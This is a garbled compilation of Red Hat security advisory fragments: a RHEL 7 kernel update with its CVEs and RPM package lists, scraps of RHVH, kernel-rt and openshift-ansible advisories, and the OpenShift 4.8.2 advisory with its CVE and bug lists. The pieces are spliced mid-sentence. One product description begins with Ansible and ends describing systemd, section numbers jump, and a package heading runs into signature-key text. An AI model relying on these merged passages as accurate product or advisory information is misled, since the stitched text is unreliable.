DASD\nwith DIAG driver returns EOPNOTSUPP (BZ#1910395)\n\n* False-positive hard lockup detected while processing the thread state\ninformation (SysRq-T) (BZ#1912221)\n\n* RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or\nmore IFL (pci) (BZ#1917943)\n\n* The NMI watchdog detected a hard lockup while printing RCU CPU stall\nwarning messages to the serial console (BZ#1924688)\n\n* nvme hangs when trying to allocate reserved tag (BZ#1926825)\n\n* [REGRESSION] \"call into AER handling regardless of severity\" triggers\ndo_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)\n\n* Module nvme_core: A double free  of the kmalloc-512 cache between\nnvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)\n\n* sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at\nkernel/timer.c:1000! (BZ#1953052)\n\n* [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit\n2a7f8c3b1d3fee is needed (BZ#1953075)\n\n* Kernel panic at cgroup_is_descendant (BZ#1957719)\n\n* [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)\n\n* IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)\n\n* [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap\n[7.9.z] (BZ#1960193)\n\n* mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)\n\n* incorrect assertion on pi_state-\u003epi_mutex.wait_lock from\npi_state_update_owner() (BZ#1965495)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c\n1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function\n1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c\n1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan\n1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.36.2.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.36.2.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.36.2.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-devel-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-headers-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm\nperf-3.10.0-1160.36.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-3.10.0-1160.36.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.36.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm\nkernel-doc-3.10.0-1160.36.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.36.2.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-3.10.0-1160.36.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-3.10.0-1160.36.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. \nThese packages include redhat-release-virtualization-host. \nRHVH features a Cockpit user interface for monitoring the host\u0027s resources\nand\nperforming administrative tasks. \n\nBug Fix(es):\n\n* xfs umount hangs in xfs_wait_buftarg() due to negative bt_io_count\n(BZ#1949916)\n\n4. \n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nAnsible is a SSH-based configuration management, deployment, and task\nexecution system. The openshift-ansible packages contain Ansible code and\nplaybooks for installing and upgrading OpenShift Container Platform 3. It provides\naggressive parallelism capabilities, uses socket and D-Bus activation for\nstarting services, offers on-demand starting of daemons, and keeps track of\nprocesses using Linux cgroups. In addition, it supports snapshotting and\nrestoring of the system state, maintains mount and automount points, and\nimplements an elaborate transactional dependency-based service control\nlogic. It can also work as a drop-in replacement for sysvinit. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.3.z source tree\n(BZ#1957359)\n\n* Placeholder bug for OCP 4.7.0 rpm release (BZ#1983534)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.8.2 bug fix and security update\nAdvisory ID:       RHSA-2021:2438-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2438\nIssue date:        2021-07-27\nCVE Names:         CVE-2016-2183 CVE-2020-7774 CVE-2020-15106 \n                   CVE-2020-15112 CVE-2020-15113 CVE-2020-15114 \n                   CVE-2020-15136 CVE-2020-26160 CVE-2020-26541 \n                   CVE-2020-28469 CVE-2020-28500 CVE-2020-28852 \n                   CVE-2021-3114 CVE-2021-3121 CVE-2021-3516 \n                   CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n                   CVE-2021-3537 CVE-2021-3541 CVE-2021-3636 \n                   CVE-2021-20206 CVE-2021-20271 CVE-2021-20291 \n                   CVE-2021-21419 CVE-2021-21623 CVE-2021-21639 \n                   CVE-2021-21640 CVE-2021-21648 CVE-2021-22133 \n                   CVE-2021-23337 CVE-2021-23362 CVE-2021-23368 \n                   CVE-2021-23382 CVE-2021-25735 CVE-2021-25737 \n                   CVE-2021-26539 CVE-2021-26540 CVE-2021-27292 \n                   CVE-2021-28092 CVE-2021-29059 CVE-2021-29622 \n                   CVE-2021-32399 CVE-2021-33034 CVE-2021-33194 \n                   CVE-2021-33909 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.8.2 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.8.2. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2437\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nSecurity Fix(es):\n\n* SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n(CVE-2016-2183)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* etcd: Large slice causes panic in decodeRecord method (CVE-2020-15106)\n\n* etcd: DoS in wal/wal.go (CVE-2020-15112)\n\n* etcd: directories created via os.MkdirAll are not checked for permissions\n(CVE-2020-15113)\n\n* etcd: gateway can include itself as an endpoint resulting in resource\nexhaustion and leads to DoS (CVE-2020-15114)\n\n* etcd: no authentication is performed against endpoints provided in the\n- --endpoints flag (CVE-2020-15136)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve\n(CVE-2021-3114)\n\n* containernetworking-cni: Arbitrary path injection via type field in CNI\nconfiguration (CVE-2021-20206)\n\n* containers/storage: DoS via malicious image (CVE-2021-20291)\n\n* prometheus: open redirect under the /new endpoint (CVE-2021-29622)\n\n* golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)\n\n* go.elastic.co/apm: leaks sensitive HTTP headers during panic\n(CVE-2021-22133)\n\nSpace precludes listing in detail the following additional CVEs fixes:\n(CVE-2021-27292), (CVE-2021-28092), (CVE-2021-29059), (CVE-2021-23382),\n(CVE-2021-26539), (CVE-2021-26540), (CVE-2021-23337), (CVE-2021-23362) and\n(CVE-2021-23368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-x86_64\n\nThe image digest is\nssha256:0e82d17ababc79b10c10c5186920232810aeccbccf2a74c691487090a2c98ebc\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-s390x\n\nThe image digest is\nsha256:a284c5c3fa21b06a6a65d82be1dc7e58f378aa280acd38742fb167a26b91ecb5\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.8.2-ppc64le\n\nThe image digest is\nsha256:da989b8e28bccadbb535c2b9b7d3597146d14d254895cd35f544774f374cdd0f\n\nAll OpenShift Container Platform 4.8 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1725981 - oc explain does not work well with full resource.group names\n1747270 - [osp] Machine with name \"\u003ccluster-id\u003e-worker\"couldn\u0027t join the cluster\n1772993 - rbd block devices attached to a host are visible in unprivileged container pods\n1786273 - [4.6] KAS pod logs show \"error building openapi models ... has invalid property: anyOf\" for CRDs\n1786314 - [IPI][OSP] Install fails on OpenStack with self-signed certs unless the node running the installer has the CA cert in its system trusts\n1801407 - Router in v4v6 mode puts brackets around IPv4 addresses in the Forwarded header\n1812212 - ArgoCD example application cannot be downloaded from github\n1817954 - [ovirt] Workers nodes are not numbered sequentially\n1824911 - PersistentVolume yaml editor is read-only with system:persistent-volume-provisioner ClusterRole\n1825219 - openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with \"Unable to connect to the server\"\n1825417 - The containerruntimecontroller doesn\u0027t roll back to CR-1 if we delete CR-2\n1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades\n1835264 - Intree provisioner doesn\u0027t respect PVC.spec.dataSource sometimes\n1839101 - Some sidebar links in developer perspective don\u0027t follow same project\n1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes\n1846875 - Network setup test high failure rate\n1848151 - Console continues to poll the ClusterVersion resource when the user doesn\u0027t have authority\n1850060 - After upgrading to 3.11.219 timeouts are appearing. \n1852637 - Kubelet sets incorrect image names in node status images section\n1852743 - Node list CPU column only show usage\n1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values\n1857008 - [Edge] [BareMetal] Not provided STATE value for machines\n1857477 - Bad helptext for storagecluster creation\n1859382 - check-endpoints panics on graceful shutdown\n1862084 - Inconsistency of time formats in the OpenShift web-console\n1864116 - Cloud credential operator scrolls warnings about unsupported platform\n1866222 - Should output all options when runing `operator-sdk init --help`\n1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard\n1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert\n1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions\n1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host\n1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions\n1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go\n1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS\n1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag\n1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method\n1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics\n1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly\n1872659 - ClusterAutoscaler doesn\u0027t scale down when a node is not needed anymore\n1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack\n1873649 - proxy.config.openshift.io should validate user inputs\n1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials\n1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable\n1876918 - scheduler test leaves taint behind\n1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1\n1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable\n1878685 - Ingress resource with \"Passthrough\"  annotation does not get applied when using the newer \"networking.k8s.io/v1\" API\n1879077 - Nodes tainted after configuring additional host iface\n1879140 - console auth errors not understandable by customers\n1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens\n1879184 - CVO must detect or log resource hotloops\n1879495 - [4.6] namespace \\\u201copenshift-user-workload-monitoring\\\u201d does not exist\u201d\n1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1879944 - [OCP 4.8] Slow PV creation with vsphere\n1880757 - AWS: master not removed from LB/target group when machine deleted\n1880758 - Component descriptions in cloud console have bad description (Managed by Terraform)\n1881210 - nodePort for router-default metrics with NodePortService does not exist\n1881481 - CVO hotloops on some service manifests\n1881484 - CVO hotloops on deployment manifests\n1881514 - CVO hotloops on imagestreams from cluster-samples-operator\n1881520 - CVO hotloops on (some) clusterrolebindings\n1881522 - CVO hotloops on clusterserviceversions packageserver\n1881662 - Error getting volume limit for plugin kubernetes.io/\u003cname\u003e in kubelet logs\n1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io\n1881938 - migrator deployment doesn\u0027t tolerate masters\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883587 - No option for user to select volumeMode\n1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine\n1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster\n1884800 - Failed to set up mount unit: Invalid argument\n1885186 - Removing ssh keys MC does not remove the key from authorized_keys\n1885349 - [IPI Baremetal] Proxy Information Not passed to metal3\n1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses\n1886572 - auth: error contacting auth provider when extra ingress (not default)  goes down\n1887849 - When creating new storage class failure_domain is missing. \n1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs\n1889689 - AggregatedAPIErrors alert may never fire\n1890678 - Cypress:  Fix \u0027structure\u0027 accesibility violations\n1890828 - Intermittent prune job failures causing operator degradation\n1891124 - CP Conformance: CRD spec and status failures\n1891301 - Deleting bmh  by \"oc delete bmh\u0027 get stuck\n1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass\n1891766 - [LSO] Min-Max filter\u0027s from OCS wizard accepts Negative values and that cause PV not getting created\n1892642 - oauth-server password metrics do not appear in UI after initial OCP installation\n1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version\n1893850 - Add an alert for requests rejected by the apiserver\n1893999 - can\u0027t login ocp cluster with oc 4.7 client without the username\n1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion\n1895053 - Allow builds to optionally mount in cluster trust stores\n1896226 - recycler-pod template should not be in kubelet static manifests directory\n1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name\n1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install\n1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout\n1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1899057 - fix spurious br-ex MAC address error log\n1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay\n1899587 - [External] RGW usage metrics shown on Object Service Dashboard  is incorrect\n1900454 - Enable host-based disk encryption on Azure platform\n1900819 - Scaled ingress replicas following sharded pattern don\u0027t balance evenly across multi-AZ\n1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed\n1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API\n1901648 - \"do you need to set up custom dns\" tooltip inaccurate\n1902003 - Jobs Completions column is not sorting when there are \"0 of 1\" and \"1 of 1\" in the list. \n1902076 - image registry operator should monitor status of its routes\n1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given\n1903228 - Pod stuck in Terminating, runc init process frozen\n1903383 - Latest RHCOS 47.83. builds failing to install: mount /root.squashfs failed\n1903553 - systemd container renders node NotReady after deleting it\n1903700 - metal3 Deployment doesn\u0027t have unique Pod selector\n1904006 - The --dir option doest not work for command  `oc image extract`\n1904505 - Excessive Memory Use in Builds\n1904507 - vsphere-problem-detector: implement missing metrics\n1904558 - Random init-p error when trying to start pod\n1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests\n1905147 - ConsoleQuickStart Card\u0027s prerequisites is a combined text instead of a list\n1905159 - Installation on previous unused dasd fails after formatting\n1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory\n1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails\n1905577 - Control plane machines not adopted when provisioning network is disabled\n1905627 - Warn users when using an unsupported browser such as IE\n1905709 - 